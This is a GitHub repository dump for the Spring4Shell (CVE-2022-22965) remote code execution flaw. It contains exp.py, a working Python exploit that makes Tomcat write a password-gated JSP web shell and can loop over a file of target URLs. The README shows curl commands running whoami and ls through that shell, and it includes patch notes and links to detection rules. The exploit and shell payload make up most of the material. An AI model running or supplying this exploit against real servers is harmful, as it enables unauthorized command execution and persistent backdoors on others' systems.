├── README.md
├── Vulnerability Analysis [CHINESE].pdf
├── Vulnerability Analysis [ENGLISH].pdf
├── exp.py
└── images
    ├── img_1.png
    └── poc.png


/README.md:
--------------------------------------------------------------------------------
 1 | # Spring Core RCE - CVE-2022-22965
 2 | 
 3 | > After Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core RCE 
 4 | >
 5 | > On March 31 Spring released new versions which fixes the vulnerability. See section [Patching](#patching).
 6 | > 
 7 | > On March 31 a [CVE-number was finally assigned to the vulnerability](https://tanzu.vmware.com/security/cve-2022-22965) with a [CVSS score 9.8 (CRITICAL)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
 8 | 
 9 | ## Proof-of-Concept
10 | The exploit is very easy to use, hence the very high CVSS score of 9.8.
11 | 
12 | To test the vulnerability you can do the following.
13 | 
14 | Start a vulnerable docker image of Spring.
15 | ```sh
16 | docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29
17 | ```
18 | 
19 | This binds the vulnerable Spring to the address `localhost:8082`.
20 | 
21 | Verify the image is started correctly with `curl`
22 | ```sh
23 | curl http://localhost:8082
24 | ```
25 | 
26 | A response of `ok` should be returned.
27 | 
28 | Let's exploit the vulnerable image now!
29 | 
30 | ```sh
31 | python3 exp.py --url http://localhost:8082
32 | ```
33 | 
34 | A response of `The vulnerability exists ....` should be returned.
35 | 
36 | You can now exploit the vulnerability with `curl`
37 | ```sh
38 | # Execute command whoami
39 | curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami
40 | 
41 | # Response has been truncated
42 | root
43 | 
44 | //
45 | - if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........
46 | 
47 | # Execute command ls
48 | curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls
49 | 
50 | # Response has been truncated
51 | app
52 | bin
53 | dev
54 | etc
55 | ..........
56 | ```
57 | 
58 | ## Circulating coding poc 
59 | **The exploit has been uploaded so far ```exp.py```**  
60 | ![Circulating coding poc ](images/poc.png)  
61 | ![awkward situation ](images/img_1.png)
62 | 
63 | ## Patching
64 | Spring have now released new versions which addresses this CVE. See [Springs announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement).
65 | 
66 | [The commit that patched the vulnerability](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529)
67 | 
68 | ## Vulnerability Impact 
69 | 1. JDK version 9 and above 
70 | 2. Spring Framework or derived frameworks are used
71 | 
72 | ## Bug fix suggestion 
73 | At present, Spring has not officially released a patch, it is recommended to reduce the jdk version as a temporary solution
74 | 
75 | ## Blue team
76 | ### Yara
77 | * [Florian Roth - Spring4Shell webshells](https://github.com/Neo23x0/signature-base/blob/master/yara/expl_spring4shell.yar)
78 | 
79 | ### Sigma
80 | * [Emanuele De Lucia - Creation of .jsp webshells](https://github.com/edelucia/rules/blob/main/sigma/Spring4Shell.yaml)
81 | 
82 | ### SPLUNK
83 | * [Alex John - Splunk detection SPL](https://github.com/west-wind/Spring4Shell-Detection)
84 | 


--------------------------------------------------------------------------------
/Vulnerability Analysis [CHINESE].pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheGejr/SpringShell/3a7f1ea03dc62fb0b048333c50c75723262ec2f8/Vulnerability Analysis [CHINESE].pdf


--------------------------------------------------------------------------------
/Vulnerability Analysis [ENGLISH].pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheGejr/SpringShell/3a7f1ea03dc62fb0b048333c50c75723262ec2f8/Vulnerability Analysis [ENGLISH].pdf


--------------------------------------------------------------------------------
/exp.py:
--------------------------------------------------------------------------------
 1 | #coding:utf-8
 2 | 
 3 | import requests
 4 | import argparse
 5 | from urllib.parse import urljoin
 6 | 
 7 | def Exploit(url):
 8 |     headers = {"suffix":"%>//",
 9 |                 "c1":"Runtime",
10 |                 "c2":"<%",
11 |                 "DNT":"1",
12 |                 "Content-Type":"application/x-www-form-urlencoded"
13 | 
14 |     }
15 |     data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
16 |     try:
17 | 
18 |         go = requests.post(url,headers=headers, data=data, timeout=15, allow_redirects=False, verify=False)
19 |         shellurl = urljoin(url, 'tomcatwar.jsp')
20 |         shellgo = requests.get(shellurl, timeout=15, allow_redirects=False, verify=False)
21 |         if shellgo.status_code == 200:
22 |             print(f"The vulnerability exists, the shell address is :{shellurl}?pwd=j&cmd=whoami")
23 |     except Exception as e:
24 |         print(e)
25 |         pass
26 | 
27 | 
28 | 
29 | 
30 | def main():
31 |     parser = argparse.ArgumentParser(description='Spring-Core Rce.')
32 |     parser.add_argument('--file', help='url file', required=False)
33 |     parser.add_argument('--url', help='target url', required=False)
34 |     args = parser.parse_args()
35 |     if args.url:
36 |         Exploit(args.url)
37 |     if args.file:
38 |         with open (args.file) as f:
39 |             for i in f.readlines():
40 |                 i = i.strip()
41 |                 Exploit(i)
42 | 
43 | if __name__ == '__main__':
44 |     main()


--------------------------------------------------------------------------------
/images/img_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheGejr/SpringShell/3a7f1ea03dc62fb0b048333c50c75723262ec2f8/images/img_1.png


--------------------------------------------------------------------------------
/images/poc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheGejr/SpringShell/3a7f1ea03dc62fb0b048333c50c75723262ec2f8/images/poc.png


--------------------------------------------------------------------------------